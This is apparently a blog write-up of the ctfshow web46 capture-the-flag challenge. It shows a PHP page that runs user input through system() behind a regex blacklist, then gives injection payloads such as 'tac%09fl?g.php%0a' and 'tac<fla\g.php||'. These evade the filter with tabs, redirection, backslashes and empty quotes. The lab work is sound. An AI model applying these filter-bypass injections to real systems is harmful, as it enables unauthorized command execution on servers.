ctfshow web入门 web46

信息收集

这下把$ *和数字也给过滤了

php 复制代码
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

解题

老配方

s 复制代码
?c=tac%09fl?g.php%0a

使用重定位符

在Shell中,反斜杠 \ 是转义字符,用于取消紧随其后的字符的特殊含义。但以下两种情况需要注意:

  • 特殊字符:如 $、*、?、空格等,反斜杠会使其失去特殊含义。
  • 普通字符:如字母、数字,反斜杠会被忽略,直接保留原字符。
    • 所以 flag.txt == fla\g.txt

< <>代替空格。具体查看Shell中的<,<<,>,>>介绍

使用重定向符来替代空格
<?配合使用会失败,原因不详

s 复制代码
?c=tac<fla\g.php||
?c=tac<>fla''g.php||

其中''被shell理解为空字符串。Shell会将 相邻的字符串片段自动拼接,无论是否被引号包裹

复制代码
┌──(si㉿kali)-[~/桌面]
└─$ echo '1'23''45
12345
相关推荐
前端西瓜哥1 天前
图形编辑器:类 Figma 所见即所得文本编辑(2)
前端
拖拉斯旋风1 天前
🧠 `useRef`:React 中“默默记住状态却不打扰 UI”的利器
前端·javascript·react.js
用户680325754321 天前
vue 上传文件到 OSS
前端
明月_清风1 天前
GSAP + ScrollTrigger 实现滚动驱动动画详解
前端
代码猎人1 天前
如何实现一个三角形
前端
龙国浪子1 天前
从点到线,从线到画:Canvas 画笔工具的实现艺术
前端·electron
代码猎人1 天前
什么是margin重叠,如何解决
前端
TeamDev1 天前
使用 Vue.js 构建 Java 桌面应用
java·前端·vue.js
DongHao1 天前
跨域问题及解决方案
前端·javascript·面试
持续升级打怪中1 天前
Vue项目中Axios全面封装实战指南
前端·javascript·vue.js